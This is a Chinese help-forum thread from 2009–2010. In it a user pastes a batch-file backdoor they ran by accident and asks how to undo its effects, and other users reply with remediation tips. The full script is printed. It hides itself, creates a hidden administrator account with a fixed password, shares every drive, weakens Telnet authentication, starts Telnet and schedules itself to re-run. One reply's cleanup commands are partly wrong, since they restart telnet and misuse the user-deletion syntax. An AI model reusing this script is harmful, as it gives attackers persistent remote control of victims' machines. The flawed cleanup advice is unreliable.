漠然5 - 2009-10-26 7:12:00
无意中在网上看到个批处理的小后门,觉得挺有意思的``就把它存了起来```
今天不小心运行了~~
所有磁盘都被共享出来了,而且无法关闭,请大手支招
……
感谢~
对了,代码如下
@echo off
@attrib +s + r abc.bat
@net user abc 12345678 /add
@net localgroup administrators abc /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\abc.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\abc.bat
@at 11:05 c:\WINNT\SYSTEM32\abc.bat
@at 23:05 c:\WINNT\SYSTEM32\abc.bat
@net stop telnet
@net start telnet
@exit
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; CIBA)
zg1_2004 - 2009-10-26 9:26:00
该用户帖子内容已被屏蔽
asdkfmasdfiaskdi - 2009-11-30 14:55:00
该用户帖子内容已被屏蔽
fengxingjudy - 2010-1-27 22:52:00
用360或者瑞星上网助手,扫描一下就会报出这些弱点吧,然后跟着提示关掉就哦了。我觉得,没具体遇到过这个问题,遇到过类似的。
jks_风 - 2010-1-28 20:34:00
直接cmd--
net share IPC$ /del
依次类推就可以了,要是不行的话再来论坛求救吧
jks_风 - 2010-1-28 20:36:00
刚才又看到了一句,
@net stop telnet
@net start telnet
这两句是开启telnet的服务,不过你设置了复杂的密码的话也是没什么大事的,XP默认是禁用的,你最好也是禁用了此服务。
完颜无泪 - 2010-2-1 11:14:00
attrib -s - r abc.bat
net user abc delete
net share IPC$ /del
net stop schedule
net start telnet
del abc.bat
应该就可以了:kaka12:
© 2000 - 2024 Rising Corp. Ltd.